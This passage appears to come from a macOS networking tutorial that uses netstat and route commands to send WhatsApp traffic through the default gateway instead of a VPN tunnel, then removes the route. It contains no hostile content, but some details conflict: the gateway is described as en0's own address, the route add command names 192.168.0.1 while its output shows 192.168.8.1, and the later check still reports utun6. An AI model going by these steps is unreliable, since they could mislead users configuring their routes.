tcp4       0      0  100.64.0.1.64768       whatsapp-cdn-shv.https ESTABLISHED
tcp4       0      0  100.64.0.1.64766       52.178.17.3.https      ESTABLISHED

Now we want to re-route whatsapp to the default interface. So lets get the IP address of the default interface.

$ netstat -nr | grep default
default            192.168.8.1        UGScg                 en0
default                                 fe80::%utun1                            UGcIg               utun1
default                                 fe80::%utun2                            UGcIg               utun2
default                                 fe80::%utun3                            UGcIg               utun3
default                                 fe80::%utun4                            UGcIg               utun4
default                                 fe80::%utun5                            UGcIg               utun5
default                                 fe80::%utun0                            UGcIg               utun0

We can see that our en0 interface is on IP address: 192.168.8.1. So lets re-route the traffic from Whatsapp’s ip address to this interace’s IP address:

$ sudo route add 102.132.99.60 192.168.0.1
route: writing to routing socket: File exists
add host 102.132.99.60: gateway 192.168.8.1: File exists

Now lets test if we are routing via the correct interface:

$ route -n get 102.132.99.60
   route to: 102.132.99.60
destination: 102.132.99.60
    gateway: 192.168.8.1
  interface: utun6
      flags: <UP,GATEWAY,HOST,DONE,STATIC>
 recvpipe  sendpipe  ssthresh  rtt,msec    rttvar  hopcount      mtu     expire
       0         0         0         0         0         0      1400         0

Finally delete the route and recheck the routing:

$ sudo route delete 102.132.99.60
delete host 102.132.99.60

$ route -n get 102.132.99.60
   route to: 102.132.99.60
destination: 102.132.99.60
    gateway: 100.64.0.1
  interface: utun6
      flags: <UP,GATEWAY,HOST,DONE,WASCLONED,IFSCOPE,IFREF>
 recvpipe  sendpipe  ssthresh  rtt,msec    rttvar  hopcount      mtu     expire
       0         0         0         0         0         0      1400         0
0
0